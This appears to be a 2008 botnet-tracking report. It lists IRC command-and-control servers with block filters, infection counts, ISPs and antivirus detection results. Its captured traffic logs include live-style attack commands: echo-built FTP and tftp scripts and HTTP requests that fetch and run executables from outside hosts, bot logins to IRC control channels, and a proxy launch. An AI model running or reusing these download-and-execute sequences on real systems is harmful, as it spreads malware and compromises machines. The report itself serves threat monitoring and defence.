Server: :x.hub.x 332 BOwPfQth ##pi## :* ipscan s.s.s dcom2 -s ][ *...
Client: GET /mub.exe HTTP/1.0Host: 72.8.143.164

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Win-Xema.variant
AntiVir	TRCrypt.PCMM.Gen
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	Kolabc.A
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	Kolabc.bto
Ikarus	Kolabc.bto
Kaspersky	Kolabc.bto
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	IRCbot.djy
Sophos	MalTibsPak
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	Crypt.PCMM.Gen

Priority 76	TCP Ports 5001	Filter deny ip host 064.085.160.111 any log ! 74 infects 05/30/08 to 08/14/08 corenetworks.net	ISP great lakes comnet inc
Clients 74	united states	Activity	Domain corenetworks.net

Chatter Example

Client: USER 1
Server: 331 Password required
Client: PASS 1
Server: 230 User logged in.
Server: RETR directxx.exe
Server: 150 Opening BINARY mode data connection
Server: 221 Goodbye happy r00ting.
Client: NICK USA|00|2K|SP2|L|418472USER xwuxeez 0 0...
Server: :irc4.kid.de NOTICE AUTH :*** Couldn\\'t resolve your hostname;...
Client: USERHOST USA|00|2K|SP2|L|418472
Client: MODE USA|00|2K|SP2|L|418472 -xt+iBJOIN ##FigaX## s33R09USERHOST...
Server: PONG :irc4.kid.de

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRCrypt.XPACK.Gen
Authentium	MISSED
Avast	_EggDrop-AC
AVG	SHeur.BLHW
BitDefender	GenPack_Generic.Sdbot.A75CBC9A
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	HLLW.MyBot.based
eSafe	SuspiciousR-Mytob3
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	Suspicious_Malware!Gemini
Ikarus	IRCBot.az
Kaspersky	BAT.Regger.b
McAfee	MISSED
Microsoft	Rbot.gen
NOD32v2	MISSED
Norman	SDBot.BOMU
Panda	MISSED
Prevx1	MISSED
Rising	IRCbot.az
Sophos	SusComPack-C
Sunbelt	MISSED
Symantec	IRCbot
TheHacker	Behav-Heuristic-065
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	Crypt.XPACK.Gen

Priority 47	TCP Ports 7000	Filter deny ip host 210.217.196.011 any log ! 46 infects 05/10/08 to 05/12/08 innosoft.biz	ISP intertns-lline-giga
Clients 46	korea_ republic of	Activity	Domain innosoft.biz

Chatter Example

Client: USER a
Client: PASS a
Server: RETR msnmanegers.exe
Client: PASS saad
Client: NICK GOGO6-yikrirUSER GOGO6-yikrir 0 0 :GOGO6-yikrir
Client: JOIN #scop# servec
Client: USERHOST GOGO6-yikrir
Server: :GOGO6-yikrir!~GOGO6-yikrir@192.168.1.205 JOIN :#scop#

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Kolab.200441
AntiVir	TRCrypt.XPACK.Gen
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	Packer.PrivateExeProtector.A
CAT-QuickHeal	I-Kolab.re
ClamAV	MISSED
DrWeb	IRC.Bot
eSafe	MISSED
eTrust-Vet	ForBot.VC
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	Zlob.CWP
F-Secure	Kolab.qa
Ikarus	Packer.PrivateExeProtector.A
Kaspersky	Kolab.qa
McAfee	Generic.dx
Microsoft	Ircbrute
NOD32v2	Kolab.QW
Norman	Smalltroj.DVMM
Panda	MISSED
Prevx1	SPYBOTAX.99328
Rising	MISSED
Sophos	MalGeneric-A
Sunbelt	MISSED
Symantec	Spybot.Worm
TheHacker	Kolab.re
VBA32	Kolab.qa
VirusBuster	MISSED
Webwasher Gateway	Crypt.XPACK.Gen

Priority 44	TCP Ports 7000	Filter deny ip host 218.093.014.236 any log ! 43 infects 04/29/08 to 05/03/08 -	ISP jintan changshen elementary school
Clients 43	china	Activity	Domain -

Chatter Example

Client: USER a
Client: PASS a
Server: RETR hotfixs.exe
Client: NICK TAHY-yzlidrUSER TAHY-yzlidr 0 0 :TAHY-yzlidr
Client: JOIN #scop# servec
Client: USERHOST TAHY-yzlidr
Server: :TAHY-yzlidr!~TAHY-yzlidr@192.168.1.210 JOIN :#SCOP#:ABOSAL7 332...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	IRCBot.variant
AntiVir	TRCrypt.TPM.Gen
Authentium	MISSED
Avast	_Rbot-FHT
AVG	SHeur.ADOK
BitDefender	DeepScan_Generic.Sdbot.DB298152
CAT-QuickHeal	SdBot.gen
ClamAV	PUA.Packed.Themida
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	ForBot.TT
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	SDBot.GAV!worm
F-Prot	Backdoor2.KLJ
F-Secure	MISSED
Ikarus	Generic.Sdbot
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	DIMPY.WIN32VBSY.Q
Rising	Rbot.fda
Sophos	SusComPack
Sunbelt	MISSED
Symantec	MISSED
TheHacker	Behav-Heuristic-064
VBA32	MISSED
VirusBuster	Rbot.UWC
Webwasher Gateway	Crypt.TPM.Gen

Priority 42	TCP Ports 13001 12351	Filter deny ip host 122.131.133.019 any log ! 41 infects 08/07/08 to 08/07/08 mesh.ad.jp	ISP nec biglobe ltd
Clients 41	japan	Activity	Domain mesh.ad.jp

Chatter Example

Client: echo open 118.8.34.6 4889>.pif C:\\WINNT\\system32>
Client: echo user a a>>.pif C:\\WINNT\\system32>
Client: echo binary>>.pif C:\\WINNT\\system32>echo GET...
Client: echo bye>>.pif C:\\WINNT\\system32>
Client: echo @echo off >c.bat
Client: C:\\WINNT\\system32>echo ftp -n -v -s:.pif...
Client: echo iexplorer.exe >>c.batC:\\WINNT\\system32>
Client: echo del .pif >>c.batC:\\WINNT\\system32>
Client: echo del /F c.bat >>c.batC:\\WINNT\\system32>
Client: echo exit /y >>c.batC:\\WINNT\\system32>
Client: USER a
Client: PASS a
Server: RETR iexplorer.exe
Client: NICK `hltutvUSER `hltutv 0 0 :`hltutv
Client: JOIN #.has hs
Server: :`hltutv!~hltutv@192.168.1.182 JOIN :#.has:aaa.5125.com 332...
Client: USERHOST `hltutvJOIN #.has hsUSERHOST `hltutvJOIN #.has...
Client: JOIN #.sd
Server: :`hltutv!~hltutv@192.168.1.182 JOIN :#.sd:aaa.5125.com 332...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRSpy.Games.A
Authentium	STZ_like!Generic
Avast	MISSED
AVG	PolyCrypt
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	STZ_like!Generic
F-Secure	Suspicious_Malware!Gemini
Ikarus	Virut.n
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	Spy.Games.A

Priority 42	TCP Ports 65520 80 65520 67 65520 217 65520 72	Filter deny ip host 085.114.143.208 any log ! 41 infects 03/11/08 to 04/21/08 fastit.net	ISP fastit
Clients 41	germany	Activity	Domain fastit.net

Chatter Example

Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 202.71.58.66:6855
Client: NICK ewyuweihUSER v020501 . . :-
Client: JOIN &virtu

more....

BotClient Antivirus Diagnoses

AhnLab-V3	Virut.D
AntiVir	Virut.Gen
Authentium	Korgo.S
Avast	_Korgo-S
AVG	Virut
BitDefender	Padobot.N
CAT-QuickHeal	Virut.D
ClamAV	Virut.ii
DrWeb	Virut.5
eSafe	Virut.gen
eTrust-Vet	Virut.9276
Ewido	Padobot.n
FileAdvisor	MISSED
Fortinet	Virut.E
F-Prot	Korgo.S
F-Secure	Horst.gen33
Ikarus	Korgo.N
Kaspersky	Virut.n
McAfee	Virut.gen
Microsoft	Virut.AK
NOD32v2	Virut.E
Norman	Korgo.U
Panda	Virutas.G
Prevx1	MISSED
Rising	Virut.GEN
Sophos	Vetor-A
Sunbelt	MISSED
Symantec	Virut.B
TheHacker	Virut.F
VBA32	Virut.3
VirusBuster	Korgo.U
Webwasher Gateway	Virut.Gen

Priority 31	TCP Ports 13001 12351	Filter deny ip host 118.236.160.101 any log ! 30 infects 08/06/08 to 08/06/08 -	ISP -
Clients 30	-	Activity	Domain -

Chatter Example

Client: echo open 119.72.89.185 12631>.pif C:\\WINNT\\system32>
Client: echo user a a>>.pif C:\\WINNT\\system32>
Client: echo binary>>.pif C:\\WINNT\\system32>
Client: echo GET iexplorer.exe>>.pif C:\\WINNT\\system32>
Client: echo bye>>.pif C:\\WINNT\\system32>
Client: echo @echo off >c.batC:\\WINNT\\system32>
Client: echo ftp -n -v -s:.pif >>c.batC:\\WINNT\\system32>
Client: echo iexplorer.exe >>c.batC:\\WINNT\\system32>
Client: echo del .pif >>c.batC:\\WINNT\\system32>
Client: echo del /F c.bat >>c.batC:\\WINNT\\system32>
Client: echo exit /y >>c.batC:\\WINNT\\system32>
Client: USER a
Client: PASS a
Server: RETR iexplorer.exe
Client: NICK `frklpiUSER `frklpi 0 0 :`frklpi
Client: JOIN #.has hs
Server: :`frklpi!~frklpi@192.168.1.85 JOIN :#.has:aaa.23215.com 332...
Client: USERHOST `frklpiJOIN #.has hsUSERHOST `frklpiJOIN #.has...
Server: PONG :aaa.23215.com
Server: PONG :aaa.23215.com

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	Virut.AF
Authentium	MISSED
Avast	_Agent-AABV
AVG	PSW.Generic6.QSP
BitDefender	Generic.343948
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	Suspicious_Malware!Gemini
Ikarus	Virut.n
Kaspersky	MISSED
McAfee	MISSED
Microsoft	Wootbot.EG
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	SusUnkPacker
Sunbelt	MISSED
Symantec	Virut.W
TheHacker	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	Virut.AF

Priority 24	TCP Ports 3267	Filter deny ip host 069.042.216.124 any log ! 24 infects 03/11/08 to 04/25/08 awknet.com	ISP awknet communications llc
Clients 24	united states	Activity	Domain awknet.com

Chatter Example

Client: USER a
Client: PASS a
Server: RETR igfsfds.exe
Client: NICK X-lpjxknUSER X-lpjxkn 0 0 :X-lpjxkn
Server: :Irc.Sr.Net NOTICE AUTH :*** Looking up your hostname...
Client: JOIN ##for## Xkey
Server: :X-lpjxkn!X-lpjxkn@27E9365A.D155DBF7.2AD31F75.IP JOIN...
Client: USERHOST X-lpjxknJOIN ##for## XkeyUSERHOST X-lpjxknJOIN ##for##...
Server: PONG :Irc.Sr.Net
Server: PONG :Irc.Sr.Net
Server: PONG :Irc.Sr.Net
Server: PONG :Irc.Sr.Net
Server: PONG :Irc.Sr.Net
Server: PONG :Irc.Sr.Net
Server: PONG :Irc.Sr.Net
Server: PONG :Irc.Sr.Net

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRCrypt.XPACK.Gen
Authentium	MISSED
Avast	MISSED
AVG	RBot.FA
BitDefender	DeepScan_Generic.Sdbot.B5801B22
CAT-QuickHeal	SdBot.gen
ClamAV	PUA.Packed.Themida
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	RBot.HTQ!tr.bdr
F-Prot	MISSED
F-Secure	SDBot.gen8
Ikarus	Generic.Sdbot
Kaspersky	Rbot.htq
McAfee	MISSED
Microsoft	Ircbrute
NOD32v2	MISSED
Norman	SDBot.gen8
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MalGeneric-A
Sunbelt	VIPRE.Suspicious
Symantec	MISSED
TheHacker	BackdoorRbot.htq
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	Crypt.XPACK.Gen

Priority 18	TCP Ports 5001	Filter deny ip host 213.239.192.125 any log ! 18 infects 05/31/08 to 08/14/08 your-server.de	ISP hetzner-rz-nbg-net
Clients 18	germany	Activity	Domain your-server.de

Chatter Example

Client: USER 1
Server: 331 Password required
Client: PASS 1
Server: 230 User logged in.
Server: RETR directxx.exe
Server: 150 Opening BINARY mode data connection
Server: 221 Goodbye happy r00ting.
Client: NICK USA|00|XP|SP0|L|928743USER nnuiqxt 0 0...
Server: :irc3.kid.de NOTICE AUTH :*** Couldn\\'t resolve your hostname;...
Client: USERHOST USA|00|XP|SP0|L|928743
Client: MODE USA|00|XP|SP0|L|928743 -xt+iBJOIN ##FigaX## s33R09USERHOST...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRCrypt.XPACK.Gen
Authentium	MISSED
Avast	_EggDrop-AC
AVG	SHeur.BLHW
BitDefender	GenPack_Generic.Sdbot.A75CBC9A
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	HLLW.MyBot.based
eSafe	SuspiciousR-Mytob3
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	Suspicious_Malware!Gemini
Ikarus	IRCBot.az
Kaspersky	BAT.Regger.b
McAfee	MISSED
Microsoft	Rbot.gen
NOD32v2	MISSED
Norman	SDBot.BOMU
Panda	MISSED
Prevx1	MISSED
Rising	IRCbot.az
Sophos	SusComPack-C
Sunbelt	MISSED
Symantec	IRCbot
TheHacker	Behav-Heuristic-065
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	Crypt.XPACK.Gen

Priority 18	TCP Ports 10324 5190 1863	Filter deny ip host 067.043.236.098 any log ! 18 infects 06/09/08 to 08/29/08 synflood.ws	ISP globotech communications
Clients 18	canada	Activity	Domain synflood.ws

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 122.42.21.70 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 122.42.21.70 get dllhost.exe wins\\DLLHOST.EXE
Client: ...
Server: GET /
Server: GET /pub/ICQ_Win95_98_NT4/ICQ_4/Lite_Edition/icq4_setup.exe...
Server: GET /pub/ICQ_Win95_98_NT4/ICQ_4/Lite_Edition/icq4_setup.exe...
Client: USER ecvkbv ecvkbv ecvkbv :icjtiniemopoidod
Client: NICK pehKbHna
Client: MODE pehKbHna +xi
Client: JOIN #las6 USERHOST pehKbHna
Client: MODE #las6 +smntu
Server: :hub.54535.com 482 pehKbHna #las6 :You\\'re not channel operator
Client: MODE #rs2 +smntu
Server: :hub.54535.com 482 pehKbHna #rs2 :You\\'re not channel operator
Client: MODE #fox +smntu
Server: :hub.54535.com 482 pehKbHna #fox :You\\'re not channel operator
Server: GET /is2.exe HTTP/1.0Host: nadsam0.info
Server: GET /is.exe HTTP/1.0Host: nadsam0.info
Server: GET /is3.exe HTTP/1.0Host: nadsam0.info
Server: GET /rm.exe HTTP/1.0Host: nadsam0.info
Server: GET /kat.exe HTTP/1.0Host: nadsam0.info
Server: GET /xxx.exe HTTP/1.0Host: nadsam0.info
Server: PONG :hub.54535.com
Server: PONG :hub.54535.com

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	MISSED
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	MISSED
Ikarus	MISSED
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 17	TCP Ports 13001 12351	Filter deny ip host 118.236.126.084 any log ! 17 infects 08/05/08 to 08/05/08 -	ISP -
Clients 17	-	Activity	Domain -

Chatter Example

Client: echo open 213.242.234.228 4147>.pif C:\\WINNT\\system32>
Client: echo user a a>>.pif C:\\WINNT\\system32>
Client: echo binary>>.pif C:\\WINNT\\system32>
Client: echo GET iexplorer.exe>>.pif C:\\WINNT\\system32>
Client: echo bye>>.pif C:\\WINNT\\system32>
Client: echo @echo off >c.batC:\\WINNT\\system32>echo ftp -n -v -s:.pif...
Client: echo iexplorer.exe >>c.batC:\\WINNT\\system32>
Client: echo del .pif >>c.batC:\\WINNT\\system32>
Client: echo del /F c.bat >>c.batC:\\WINNT\\system32>echo exit /y...
Client: USER a
Client: PASS a
Server: RETR iexplorer.exe
Client: NICK `zohtutaUSER `zohtuta 0 0 :`zohtuta
Client: JOIN #.has hs
Server: :`zohtuta!~zohtuta@192.168.1.214 JOIN :#.has:aaa.24801.com 332...
Client: USERHOST `zohtutaJOIN #.has hsUSERHOST `zohtutaJOIN #.has...
Server: PONG :aaa.24801.com
Server: PONG :aaa.24801.com
Server: PONG :aaa.24801.com
Server: PONG :aaa.24801.com

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRSpy.Games.A
Authentium	STZ_like!Generic
Avast	MISSED
AVG	PolyCrypt
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	STZ_like!Generic
F-Secure	Suspicious_Malware!Gemini
Ikarus	Virut.n
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	Spy.Games.A

Priority 16	TCP Ports 2345	Filter deny ip host 084.244.019.183 any log ! 16 infects 03/13/08 to 04/26/08 spray.net	ISP spray network services ab
Clients 16	sweden	Activity	Domain spray.net

Chatter Example

Client: GET /mixit.exe HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
Client: NICK NT50|00026916USER NT50|00026916 0 0 :NT50|00026916
Client: USERHOST NT50|00026916
Server: :NT50|00026916 MODE NT50|00026916 :+iw
Client: MODE NT50|00026916 +n+BJOIN #!MMT! Mixxx74USERHOST...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	BDSVanBot.EL.3
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	BehavesLike_ProcessHijack
CAT-QuickHeal	Hoax.Renos.fh.3
ClamAV	MISSED
DrWeb	MulDrop.12184
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	MISSED
Ikarus	MISSED
Kaspersky	Heur.Generic
McAfee	MISSED
Microsoft	VirTool_CeeInject.gen!A
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	Banker
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 13	TCP Ports 6667	Filter deny ip host 092.114.004.002 any log ! 13 infects 08/01/08 to 08/06/08 apexcovantage.com	ISP eu-zz
Clients 13	united kingdom	Activity	Domain apexcovantage.com

Chatter Example

Client: USER 1
Server: 331 Password required
Client: PASS 1
Server: 230 User logged in.
Server: RETR mssngear.exe
Server: 150 Opening BINARY mode data connection
Server: 221 Goodbye happy r00ting.
Client: NICK wntczkUSER bijzdgt 0 0 :wntczk
Server: :romania.indoirc.net NOTICE AUTH :*** Looking up your hostname...
Client: USERHOST wntczk
Client: MODE wntczk -x+iJOIN ##!cool!## USERHOST wntczkMODE wntczk...

more....

BotClient Antivirus Diagnoses

AhnLab-V3	IRCBot.variant
AntiVir	TRCrypt.XPACK.Gen
Authentium	MISSED
Avast	_Rbot-FZI
AVG	SHeur.BEED
BitDefender	DeepScan_Generic.Sdbot.FB626257
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	MISSED
Ikarus	MISSED
Kaspersky	Heur.Generic
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	Ircbot.ABYS
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MalEncPk-DM
Sunbelt	MISSED
Symantec	Packed.Generic.138
TheHacker	MISSED
VBA32	MISSED
VirusBuster	PackedXPack
Webwasher Gateway	Crypt.XPACK.Gen

Priority 13	TCP Ports 6556 6556 194	Filter deny ip host 194.109.011.065 any log ! 13 infects 06/10/08 to 08/30/08 xs4all.net	ISP xs4all ppp _30 router subnets
Clients 13	netherlands	Activity	Domain xs4all.net

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 74.214.47.11 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 74.214.47.11 get dllhost.exe wins\\DLLHOST.EXE
Client: USER plqhqetu plqhqetu plqhqetu :dETOX/0x91 (win32)NICK plqhqetu
Client: USER plqhqetu plqhqetu plqhqetu :dETOX/0x91 (win32)NICK plqhqetu
Client: USER plqhqetu plqhqetu plqhqetu :dETOX/0x91 (win32)NICK plqhqetu
Client: USER plqhqetu plqhqetu plqhqetu :dETOX/0x91 (win32)NICK plqhqetu
Client: USER plqhqetu plqhqetu plqhqetu :dETOX/0x91 (win32)NICK plqhqetu
Client: USER plqhqetu plqhqetu plqhqetu :dETOX/0x91 (win32)NICK plqhqetu
Client: USER plqhqetu plqhqetu plqhqetu :dETOX/0x91 (win32)NICK plqhqetu
Client: USER plqhqetu plqhqetu plqhqetu :dETOX/0x91 (win32)NICK plqhqetu
Client: USER plqhqetu plqhqetu plqhqetu :dETOX/0x91 (win32)NICK plqhqetu
Client: USER plqhqetu plqhqetu plqhqetu :dETOX/0x91 (win32)NICK plqhqetu
Client: USER plqhqetu plqhqetu plqhqetu :dETOX/0x91 (win32)NICK plqhqetu
Client: USER plqhqetu plqhqetu plqhqetu :dETOX/0x91 (win32)NICK plqhqetu
Client: USER plqhqetu plqhqetu plqhqetu :dETOX/0x91 (win32)NICK plqhqetu
Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
Client: JOIN #9# g3t0u7
Server: :plqhqetu!plqhqetu@192.168.1.137 JOIN :#9# g3t0u7
Client: MODE plqhqetu +i
Client: JOIN #9# g3t0u7
Server: :plqhqetu!plqhqetu@192.168.1.137 JOIN :#9# g3t0u7

more....

BotClient Antivirus Diagnoses

AhnLab-V3	IRCBot.20959
AntiVir	Codbot.BG
Authentium	Sdbot.LHJ
Avast	_CodBot-P
AVG	Generic.GFM
BitDefender	Codbot.AG
CAT-QuickHeal	MISSED
ClamAV	Stration.QR-1
DrWeb	IRC.Moto
eSafe	Stration
eTrust-Vet	Toxbot.AO
Ewido	Codbot.ag
FileAdvisor	MISSED
Fortinet	SpyBot.ZI!dam
F-Prot	Sdbot.LHJ
F-Secure	Codbot.bn
Ikarus	Codbot.bn
Kaspersky	Codbot.bn
McAfee	Proxy-FBSR
Microsoft	Codbot
NOD32v2	Codbot
Norman	Codbot.BG
Panda	Codbot.BC.worm
Prevx1	MISSED
Rising	Codbot.l
Sophos	MalIRCBot-B
Sunbelt	MISSED
Symantec	Toxbot
TheHacker	BackdoorCodbot.ag
VBA32	Codbot.ag
VirusBuster	Codbot.W
Webwasher Gateway	Codbot.20959

Priority 13	TCP Ports 7000 7000 85	Filter deny ip host 067.019.050.066 any log ! 13 infects 04/06/08 to 04/09/08 theplanet.com	ISP theplanet.com internet services inc
Clients 13	united states	Activity	Domain theplanet.com

Chatter Example

Client: USER 1
Server: 331 Password required
Client: PASS 1
Server: 230 User logged in.
Server: RETR WinTcpipi.exe
Server: 150 Opening BINARY mode data connection
Server: 221 Goodbye happy r00ting.
Client: PASS scorti1
Client: NICK USA|2K|SP2|00|21483672USER kwffwzhag 0 0...
Client: USERHOST USA|2K|SP2|00|21483672
Client: MODE USA|2K|SP2|00|21483672 -x+iJOIN #Virus# ss88ss.
Server: PONG :C31568-39877
Server: PONG :C31568-39877
Server: PONG :C31568-39877

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRCrypt.XPACK.Gen
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	Packer.PrivateExeProtector.A
CAT-QuickHeal	Rbot.hzn
ClamAV	Mybot-10307
DrWeb	IRC.Sdbot.3269
eSafe	MISSED
eTrust-Vet	VMalum.BXDF
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	Backdoor2.UGS
F-Secure	Rbot.jog
Ikarus	Rbot.jog
Kaspersky	Rbot.jog
McAfee	MISSED
Microsoft	Rbot
NOD32v2	MISSED
Norman	Smalltroj.CXRU
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MalGeneric-A
Sunbelt	MISSED
Symantec	Spybot.Worm
TheHacker	BackdoorRbot.hzn
VBA32	Rbot.hzn
VirusBuster	MISSED
Webwasher Gateway	Crypt.XPACK.Gen

Priority 12	TCP Ports 8080 8080 72 1863 10324	Filter deny ip host 067.043.236.066 any log ! 12 infects 04/12/08 to 08/30/08 synflood.ws	ISP globotech communications
Clients 12	canada	Activity	Domain synflood.ws

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 203.91.181.194 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 203.91.181.194 get dllhost.exe wins\\DLLHOST.EXE
Client: USER pbvxmp pbvxmp pbvxmp :kvljrschnzkaxqlb
Client: NICK nWSQandb
Client: MODE nWSQandb +xi
Client: JOIN #las6 USERHOST nWSQandb
Client: MODE #las6 +smntu
Server: :hub.54535.com 482 nWSQandb #las6 :You\\'re not channel operator
Client: MODE #rs2 +smntu
Server: :hub.54535.com 482 nWSQandb #rs2 :You\\'re not channel operator
Client: MODE #fox +smntu
Server: :hub.54535.com 482 nWSQandb #fox :You\\'re not channel operator
Client: GET /rm.exe HTTP/1.0Host: alwayssam.com
Server: GET /aback.exe HTTP/1.0Host: zonetech.info
Server: GET /x3.exe HTTP/1.0Host: alwayssam.com
Server: GET /is.exe HTTP/1.0Host: alwayssam.com

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	TRCrypt.NSPM.Gen
Authentium	MISSED
Avast	MISSED
AVG	RBot.KB
BitDefender	Packer.RLPack.D
CAT-QuickHeal	Qhost.kks
ClamAV	MISSED
DrWeb	Noupd.6
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	PossibleThreat
F-Prot	MISSED
F-Secure	Qhost.kks
Ikarus	Packer.RLPack.D
Kaspersky	Qhost.kks
McAfee	Qhost-Gen
Microsoft	Qhost.gen!C
NOD32v2	MISSED
Norman	Qhost.EHR
Panda	TrjKillAV.IM
Prevx1	MISSED
Rising	MISSED
Sophos	MalGeneric-A
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
VBA32	NoUpdate.b
VirusBuster	MISSED
Webwasher Gateway	Crypt.NSPM.Gen

Priority 12	TCP Ports 13001	Filter deny ip host 190.075.104.096 any log ! 12 infects 08/03/08 to 08/03/08 cantv.net	ISP cantv servicios venezuela
Clients 12	venezuela	Activity	Domain cantv.net

Chatter Example

Client: echo open 124.101.247.148 21165>.pif C:\\WINNT\\system32>
Client: echo user a a>>.pif C:\\WINNT\\system32>
Client: echo binary>>.pif C:\\WINNT\\system32>
Client: echo GET iexplorer.exe>>.pif C:\\WINNT\\system32>
Client: echo bye>>.pif C:\\WINNT\\system32>
Client: echo @echo off >c.batC:\\WINNT\\system32>
Client: echo ftp -n -v -s:.pif >>c.batC:\\WINNT\\system32>
Client: echo iexplorer.exe >>c.batC:\\WINNT\\system32>
Client: echo del .pif >>c.batC:\\WINNT\\system32>
Client: echo del /F c.bat >>c.batC:\\WINNT\\system32>
Client: echo exit /y >>c.batC:\\WINNT\\system32>
Client: USER a
Client: PASS a
Server: RETR iexplorer.exe
Client: NICK `udqcfbkpUSER `udqcfbkp 0 0 :`udqcfbkp
Client: JOIN #.has hs
Server: :`udqcfbkp!~udqcfbkp@192.168.1.188 JOIN :#.has:aaa.55560.com 332...
Client: USERHOST `udqcfbkpJOIN #.has hsUSERHOST `udqcfbkpJOIN #.has...
Client: PRIVMSG sd :welcome biatch!
Client: PRIVMSG sd :[Socks4] Starting Socks4 Proxy on port 45123.
Server: PONG :aaa.55560.com
Server: PONG :aaa.55560.com

more....

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	Virut.A
